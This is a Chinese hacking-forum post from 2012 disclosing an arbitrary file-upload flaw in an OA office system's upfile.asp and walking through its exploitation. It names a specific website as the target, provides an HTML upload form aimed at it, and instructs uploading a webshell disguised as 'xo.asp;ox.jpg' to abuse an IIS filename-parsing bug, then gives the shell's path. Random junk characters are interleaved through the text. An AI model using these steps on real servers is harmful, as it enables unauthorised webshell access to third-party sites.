找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2160|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞; \( z5 [: b. t3 d( j5 j

8 [: w3 \( Z- q系统介绍:0 E7 @4 k9 S9 E% `

. N) ]+ z, ~$ J8 G9 g, Z+ |/ t6 V全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
/ X2 L9 ^& ^% p& A2 K: p
8 n  A; A8 f# W) U1 Q, m主要功能:
4 z7 B* R6 X6 U- x0 t# H公司通告
' L% O' `6 x6 U6 E& H工作计划
+ B0 j. |/ L" E1 F. t' G通讯助理
2 L+ j+ w8 j- ]5 s5 Y' z* Q客户资源
( |9 Z7 `6 G1 x! a. f+ l我的公文
8 s& U2 d3 l4 G, ]$ C+ X公文传阅 % y4 z7 v+ [( l8 Q" i# }6 B
公共资源 4 x% g' G& H  s  `' [/ m5 y
资源预约 ; Y& c% w  A. V% M. b
今日考勤
" G3 k" ~) Y$ v2 \8 _个人计划 9 V/ {0 c1 I) B, k8 [( ~, d
个人通讯录 / W5 g! U. \* d2 H$ Y
个人基本档案 - B9 c+ x7 ?2 z; \' r
未读邮件
! N9 Q) O9 W) P7 v! }& K' d* S# A/ d发邮件
& k# Z+ f) b' `, {+ {0 d9 O9 L收件夹
' I6 A6 @7 O$ M* i8 ]寄件夹 ( ~, i  M9 O7 d! o7 H; G
网络硬盘 7 y3 P* k/ |% ?) m' y/ g' f/ S- P
网络会议
' M. W' z9 z8 ~/ X+ I网络调查 % f& \9 r' d! f8 ]0 q1 \
交流论坛) v3 u% Q% o. J6 {' p1 T# w

: d, W: }, O# X- Q$ {有兴趣测试的朋友可以下源码看看
* B# W% L5 }3 _1 G, C; l5 ?: e5 g9 ]0 s6 l4 y- B3 Q
源码下载:- _8 J' V" g7 h* ~/ z, i
  y. X& K& N- V/ R- n1 }
http://www.mycodes.net/30/4750.htm2 E4 P7 i5 y. h" `

% U/ v  d) B+ N& B漏洞介绍:
& o) O* e$ M/ p' B) ^* I8 Y7 M3 `( |8 r" x- N5 c' f5 q' @! `* F1 O5 Z
由upfile.asp上传文件漏洞引起: k* S7 R8 b8 Y/ E: e  z/ `) L
* s+ M; q' t( F- V% B- H+ t
测试方法:
: ?" v' D9 Z; U6 a- P. h( o$ h  g  k1 h( w* g( P0 t
使用名小子上传http://www.itlynn.com/upfile.asp即可. V. N( @0 Q$ T7 N8 W% U

6 W/ p- b5 n  [如果upfile.asp文件被删除不存在。* K0 n8 l. z# P; J) W) ]5 F* c) Y% o
; S5 D1 X9 S8 e
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
$ ~2 l- j; }1 c. r/ s6 q- f6 E8 r5 C/ p: w% h& T1 W2 `0 _
如果存在那么将如下代码保存为upfile.html。
( @8 U8 j) N: Y' z2 f, n% ?2 b8 }5 Q' w( a
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp5 W" |3 j9 N& d9 o8 O
8 w' n7 a/ @; X$ P8 p2 ?
1 ~9 S& g. \6 G, K+ t% O

% R6 }* _- e! z. }: D) q" k01 <table border='0' align="center" cellpadding="5">
& N% X& c; y: T7 }, }8 Z- M9 r1 K. U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, J& u2 w& q4 v( x& Z( V' s+ F4 m9 O2 ~7 C( ]
03 <tr>   t, m1 h% h5 U+ n2 T7 ?' K
; ?* g- R! m, Q! U% |5 i& i
04             <td>报错:</td> 5 a+ n) o* E" p/ n; e2 a0 A! l
! ^5 {& a% g6 B: o! k! i
05             <td><input type='radio' name='errnumber' value='0'>
% b8 T, V/ e0 Z) I6 K9 F% Y( n
- h' [) m# l5 @6 e7 [, {06               自动更名 + |3 i' D  m$ o  M! L

0 v: ^8 f" }1 K" \# F07               <input type='radio' name='errnumber' value='1' checked>
' i6 Z# Q8 y% k* A
/ W/ |/ }2 [1 @* i# q2 \7 J08               报错方式
0 w5 c! e% d/ c0 N0 L
- \8 f% f- Z' d4 `- f. K3 e- g09               <input type='radio' name='errnumber' value='2'>
, |! Z" @) X5 z+ @% Y5 \# r' T( [, S' H# ?, r" j$ ]
10               直接覆盖</td> 4 |% e/ `# _+ o: G: M
) q3 N" \  {1 W
11           </tr>
9 K, l8 o5 A+ T# t( J$ a
9 P& r8 N. s7 \8 p/ x12           <tr>
  i1 I+ A6 q7 s: S; O- q9 I3 R, Q% y" a
13             <td>主题:</td> / o) Q* [+ \) U. i0 ^' i/ w

% p; M) a' r4 T, R% G, G14             <td><input type='text' name='filename' size='30'></td>
$ s. I1 b2 E9 s4 f3 |& F5 ^: y- w0 j$ q) g
15           </tr>
0 v: ?# A, b5 L' j( S0 G! c' F; P* R( [; a$ @
16           <tr> + k+ W0 o: R% `& ]- ^- y# `9 Q
& \! b1 q( Y* ?' m7 M$ f  `0 }
17             <td>文件:</td>
) ~9 z' e/ r0 k, x& _
! \/ \, V; u9 z, T5 b! |% t- h18             <td><input type="file"name="fruit"size="30"></td>
4 H( `, T, n2 @9 h
$ M" T2 h  z) a$ Q' i19           </tr> & D' U0 |9 s% b- b3 E

* |& E: e5 I$ N/ @4 k5 @1 o- _20           <tr>
$ _, K. ?8 L% ]% K  ^3 `9 z4 A+ |2 ~# [# e# C% i! s; G0 j4 v
21             <td valign='top'>简介:</td>
3 Q: X" X" }7 c+ ^, n( K% H  |2 Q
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
( I, i0 I/ B. l4 _& S# o; G2 W1 Q4 b0 h7 q! p: G4 L0 j, J
23           </tr> . L2 V7 b; s* e- A  Y

6 z7 O  M! H' k24   
7 `! e& {0 l6 c+ J! B. {" l! [' S; a: z, p# @
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> , D. Q/ f& z2 {/ b( F
2 P' Q" N8 D( T8 A) E! T# H4 e+ \  u
26           </tr>
0 u3 ?  K( c3 V* p7 |* l- h: O* M1 m$ Z: F3 a& H! y
27         </form>
4 e& ?8 j1 n' l6 b
* C5 f9 a2 ]/ a' b然后打开上传一个文件名为xo.asp;ox.jpg的文件。2 |5 J3 u8 u0 T) _; y
4 M. m6 z, d8 O( U+ Z; k

5 u+ B+ {. p1 T$ t' |9 b2 ]1 H4 E
5 }6 l8 q+ f3 m; o; v* p& d& @上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg7 \9 x) |# K3 G( R+ X. ~3 B

+ R" B" M3 X5 h/ b( W5 N此漏洞需要配合解析漏洞利用。6 G/ Z$ j8 @3 w
- p6 V0 B% _1 d3 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表